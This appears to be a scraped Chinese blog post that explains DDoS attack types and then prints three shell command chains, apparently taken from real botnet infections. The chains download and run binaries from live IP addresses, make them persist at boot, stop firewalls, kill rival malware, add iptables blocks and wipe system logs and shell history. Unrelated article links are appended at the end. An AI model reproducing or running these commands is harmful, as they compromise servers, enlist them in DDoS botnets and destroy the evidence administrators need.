为了更清楚的解释,阅读了很多这样的文章,DDOS的百度百科解释如下:

分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在网络上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。
按照TCP/IP协议的层次可将DDOS攻击分为基于ARP的攻击、基于ICMP的攻击、基于IP的攻击、基于UDP的攻击、基于TCP的攻击和基于应用层的攻击。

基于ARP


  ARP是无连接的协议,当收到攻击者发送来的ARP应答时。它将接收ARP应答包中所提供的信息。更新ARP缓存。因此,含有错误源地址信息的ARP请求和含有错误目标地址信息的ARP应答均会使上层应用忙于处理这种异常而无法响应外来请求,使得目标主机丧失网络通信能力。产生拒绝服务,如ARP重定向攻击。

基于ICMP


  攻击者向一个子网的广播地址发送多个ICMP Echo请求数据包。并将源地址伪装成想要攻击的目标主机的地址。这样,该子网上的所有主机均对此ICMP Echo请求包作出答复,向被攻击的目标主机发送数据包,使该主机受到攻击,导致网络阻塞。

基于IP


  TCP/IP中的IP数据包在网络传递时,数据包可以分成更小的片段。到达目的地后再进行合并重装。在实现分段重新组装的进程中存在漏洞,缺乏必要的检查。利用IP报文分片后重组的重叠现象攻击服务器,进而引起服务器内核崩溃。如Teardrop是基于IP的攻击。

基于应用层

应用层包括SMTP,HTTP,DNS等各种应用协议。其中SMTP定义了如何在两个主机间传输邮件的过程,基于标准SMTP的邮件服务器,在客户端请求发送邮件时,是不对其身份进行验证的。另外,许多邮件服务器都允许邮件中继。攻击者利用邮件服务器持续不断地向攻击目标发送垃圾邮件,大量侵占服务器资源。
可以看到攻击方式很多,那如何攻击呢?现在很多黑客论坛都在教如何zhuaj,1433,445端口,3389端口,135端口,可以参考百度经验:脚本代码1 脚本代码2.
不过笔者想了下,其实还是有很多途径去获取,譬如cacti、docker、jboss、webadmin、wdcp等,具体的利用代码请看:漏洞脚本利用代码
其实代码中大家就可以看到,利用方式举几个简单的例子:
例子1:
apt-get install curlyum install curlcurl http://121.40.175.22:15651/95 -o /tmp/gftykillall -I -q Linux6 ifconf 123killall -I -q LAdmins Admins asxperkillall -I -q g251 koiu winsx synlinshikillall -I -q mysql sysyang ifconfigethO whoami ifconfigethokillall -I -q gmetad cvn hanx .xdsy hssa ggu ggy gg azda .sshd bashpakillall -I -q sshpa udevd .SSH2 .SSHH2 nhgbhhj zl pro proh DDos64 DDos32killall -I -q dos64 dos32 sfewfesfs sfewfesfsh IptabLes tangwe IptabLexkillall -I -q .IptabLes .IptabLex 1 perl System Admins Linuxsys System32 ruskillall -I -q sql tel netstat -an ddos32_64.64 Admins koiu 315 64 udpkillall -I -q koi Chinesepoli 508 topsing weige udpapt-get install wgetyum install wgetwget -c -O /tmp/gfty http://121.40.175.22:15651/95chmod 0755 /tmp/gfty/tmp/gfty./gftynohup /tmp/gfty > /dev/null 2>&1 &echo “service gfty”>>/etc/rc.localecho “/tmp/gfty”>>/etc/rc.localchattr +i /tmp/gftyapt-get -y remove curlyum -y remove curlapt-get -y remove wgetyum -y remove wgetclearhistory -c

例子2:

cd /tmpservice iptables stoprm -rf /etc/crontabrm -rf /usr/bin/bsd-port/gettyrm -rf /usr/bin/bsd-port/*killall -9 gettyfind ./ -name “S90*” | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -frps -ef | grep -v ‘ssh’ |awk ‘{if ($3 == 1) print $2}’ | xargs kill -9yum -y install wgetwget -c http://222.186.34.174:9655/aachmod 777 aa./aawget -c http://222.186.34.174:9655/17230chmod 777 17230./17230iptables -I INPUT -s 116.31.123.159 -j DROPiptables -I INPUT -s 183.60.110.74 -j DROPiptables -I INPUT -s 122.224.32.32 -j DROPiptables -I INPUT -s 149.56.107.161 -j DROPiptables -I INPUT -s 104.223.10.48 -j DROPiptables -I INPUT -s 178.170.68.69 -j DROPiptables -I INPUT -s 158.69.219.235 -j DROPiptables -I INPUT -s 164.132.170.78 -j DROPiptables -I INPUT -s 149.202.219.49 -j DROPiptables -I INPUT -s 124.16.31.156 -j DROPiptables -I INPUT -s 183.61.171.149 -j DROPiptables -I INPUT -s 61.157.167.74 -j DROPiptables -I INPUT -s 119.63.44.35 -j DROPiptables -I INPUT -s 42.51.23.80 -j DROPiptables -I INPUT -s 104.129.35.178 -j DROPiptables -I INPUT -s 103.31.240.133 -j DROPiptables -I INPUT -s 100.42.227.29 -j DROPiptables -I INPUT -s 107.160.46.234 -j DROPiptables -I INPUT -s 222.186.34.73 -j DROPiptables -I INPUT -s 36.249.123.134 -j DROPiptables -I INPUT -s 118.193.214.160 -j DROPiptables -I INPUT -s 104.37.213.35 -j DROPiptables -I INPUT -s 58.54.39.51 -j DROPiptables -I INPUT -s 23.247.5.12 -j DROPiptables -I INPUT -s 23.247.5.11 -j DROPiptables -I INPUT -s 51.255.84.218 -j DROPiptables -I INPUT -s 98.126.8.114 -j DROPiptables -I INPUT -s 222.174.5.13 -j DROPiptables -I INPUT -s 123.184.16.119 -j DROPiptables -I INPUT -s 103.214.169.184 -j DROPiptables -I INPUT -s 103.236.220.90 -j DROPiptables -I INPUT -s 103.55.25.57 -j DROPiptables -I INPUT -s 103.55.26.91 -j DROPiptables -I INPUT -s 104.223.6.159 -j DROPiptables -I INPUT -s 107.160.46.234 -j DROPiptables -I INPUT -s 111.160.17.8 -j DROPiptables -I INPUT -s 114.112.27.83 -j DROPiptables -I INPUT -s 115.231.219.34 -j DROPiptables -I INPUT -s 115.28.206.48 -j DROPiptables -I INPUT -s 116.31.116.28 -j DROPiptables -I INPUT -s 117.18.4.110 -j DROPiptables -I INPUT -s 122.225.102.131 -j DROPiptables -I INPUT -s 123.184.16.119 -j DROPiptables -I INPUT -s 14.29.47.15 -j DROPiptables -I INPUT -s 149.202.210.93 -j DROPiptables -I INPUT -s 180.97.163.228 -j DROPiptables -I INPUT -s 183.60.0.0/24 -j DROPiptables -I INPUT -s 183.60.110.83 -j DROPiptables -I INPUT -s 183.60.149.196 -j DROPiptables -I INPUT -s 183.60.149.199 -j DROPiptables -I INPUT -s 183.61.171.147 -j DROPiptables -I INPUT -s 198.44.177.102 -j DROPiptables -I INPUT -s 204.44.67.19 -j DROPiptables -I INPUT -s 23.234.25.143 -j DROPiptables -I INPUT -s 23.234.28.85 -j DROPiptables -I INPUT -s 51.255.66.195 -j DROPiptables -I INPUT -s 58.218.200.111 -j DROPiptables -I INPUT -s 61.160.195.78 -j DROPiptables -I INPUT -s 61.174.49.203 -j DROPiptables -I INPUT -s 66.102.253.30 -j DROPiptables -I INPUT -s 66.249.65.123 -j DROPiptables -I INPUT -s 115.231.17.7 -j DROPiptables -I INPUT -s 61.174.49.203 -j DROPecho> /var/log/wtmpecho> /root/bash_historyecho> /var/log/syslogecho> /var/log/messagesecho> /var/log/httpd/access_logecho> /var/log/httpd/error_logecho> /var/log/xferlogecho> /var/log/secureecho> /var/log/auth.logecho> /var/log/user.logecho> /var/log/wtmpecho> /var/log/lastlogecho> /var/log/btmpecho> /var/run/utmphistory -cexit

例子3:

/etc/init.d/iptables stopservice iptables stopSuSEfirewall2 stopreSuSEfirewall2 stopiptables -F/etc/init.d/iptables stopservice iptables stopSuSEfirewall2 stopreSuSEfirewall2 stopiptables -F/etc/init.d/iptables stopservice iptables stopSuSEfirewall2 stopreSuSEfirewall2 stopiptables -Fchattr -i /usr/bin/wgetchmod 755 /usr/bin/wgetwget -P /bin/ http://43.230.144.65/zz -cchmod 0755 /bin/zznohup /bin/zz > /dev/null 2>&1 &chattr +i /usr/bin/wgetchmod 0 /usr/libexec/openssh/sftp-serverchattr +i /usr/libexec/openssh/sftp-serverecho ‘ ‘ > /var/log/wtmpecho ‘ ‘ > /var/log/lastlogecho ‘ ‘ > /var/log/messagesexport HISTFILE=/dev/nullrm -f /var/log/wtmprm -f .bash_historyhistory -c

来一张DDOS控制面板

简单了解下DDOS产业相关推荐

  1. CVer最想知道的,简单分析下《2020年度中国计算机视觉人才调研报告》

    文章首发于CVer最想知道的,简单分析下<2020年度中国计算机视觉人才调研报告> 最近闲来无事,老潘以一名普通算法工程师的角度,结合自身以及周围人的情况,理性也感性地分析一下极市平台前些 ...

  2. [面试]:能简单介绍下您现在所做项目和过程中的技术难点或有遇到瓶颈吗?

    思路转载自Hollis的知识星球,有兴趣的可以搜一下,很不错. 业务介绍: 1.痛点:解决的问题,用户痛点 2.正确性 3.可用性 4.大规模:量级 思考问题: 宏观,不局限于业务 这种问题直接回答高 ...

  3. HTML+CSS综合实验之简单实现环球互联网产业园网页--渐入HTML4

    HTML+CSS综合实验之简单实现环球互联网产业园网页--渐入HTML4 预计效果图 代码展示 关键代码解释 CSS css概述 多重样式将层叠为一个 伪类 锚伪类 伪类与 CSS 类 结果展示 预计 ...

  4. php doss_php下ddos攻击与防范代码

    php下ddos攻击与防范代码,有需要的朋友可以参考下. 文件:index.php 复制代码 代码如下: $ip = $_SERVER['REMOTE_ADDR']; ?> PHP DoS, C ...

  5. Example017简单的下拉框

    <!DOCTYPE html> <html lang="en"> <head><meta charset="UTF-8" ...

  6. springdatajpa命名规则_简单了解下spring data jpa

    公司准备搭建一个通用框架,以后项目就用统一一套框架了 以前只是听过jpa,但是没有实际用过 今天就来学习下一些简单的知识 什么是JPA 全称Java Persistence API,可以通过注解或者X ...

  7. html下拉折叠菜单,原生Js_实现简单的下拉折叠菜单(添加弹出动画效果)

    用javascript实现简单的下拉折叠菜单 Gary_js实现简单的下拉折叠菜单 *{margin:0px; padding:0px;} #div1 {width:200px; margin:0 a ...

  8. 简单介绍下我使用了一年多还不知道的Sql server 2005 组件知识

    简介 Microsoft SQL Server 2005 是用于大规模联机事务处理 (OLTP).数据仓库和电子商务应用的数据库平台:也是用于数据集成.分析和报表解决方案的商业智能平台. SQL Se ...

  9. python网站设计理念_简单介绍下python Django框架的历史,设计理念及优势_Django讲解2...

    简单介绍下python Django框架的历史,设计理念及优势 Django是一个高层次的 Python Web 框架,它是一个鼓励快速开发和干净,实用的框架设计.Django可以更容易地快速构建更好 ...

最新文章

  1. act转MP3格式工具
  2. MyBatis 的执行流程,写得太好了!
  3. mysql node
  4. 3:添加一个slave到已有的复制环境(基于二进制日志文件位置)
  5. Python文件读写时的换行符与回车符
  6. 视频分享:做“有料”的计算机大学生
  7. matlab ga工具箱编程,遗传算法 -- matlab ga工具箱
  8. 工业以太网EtherNet/IP协议安全分析整理
  9. Codeforces 235C. Cyclical Quest 后缀自动机
  10. SPRING IN ACTION 第4版笔记-第八章Advanced Spring MVC-003-Pizza例子的基本流程
  11. python str怎么用_python的str函数怎么使用
  12. Redis - Redis分布式算法原理——Hash一致性理解 Hash倾斜性解决方案
  13. 微信群控系统制作系列一——java模拟登录网页版微信
  14. 阿里企业邮箱设置过滤方法
  15. 如何让mysql数据库允许被远程连接访问
  16. spring boot的启动与配置
  17. 通过CTFShow例题掌握爆破方法
  18. Java SE day21_网络编程
  19. 08 Confluent_Kafka权威指南 第八章:跨集群数据镜像
  20. JS正则表达式完整教程

热门文章

  1. C#/VB.NET 在Excel单元格中应用多种字体格式
  2. 为什么要用规则引擎?(试读)
  3. 计算机图形学 学习笔记(七):二维图形变换:平移,比例,旋转,坐标变换等
  4. 「双软认定」软件企业需要满足什么条件?
  5. MybatisPlus整合SpringBoot全教程,用起来不要太方便
  6. ios的四个核心部分介绍
  7. 计算机win10内存,win10系统电脑可用内存异常的解决方法
  8. 通读《构建之法》之后的问题
  9. dart sqlite 嵌入式数据库 sqflite教程
  10. 科普 | 抖音服务器带宽有多大,为什么能够供那么多人同时刷?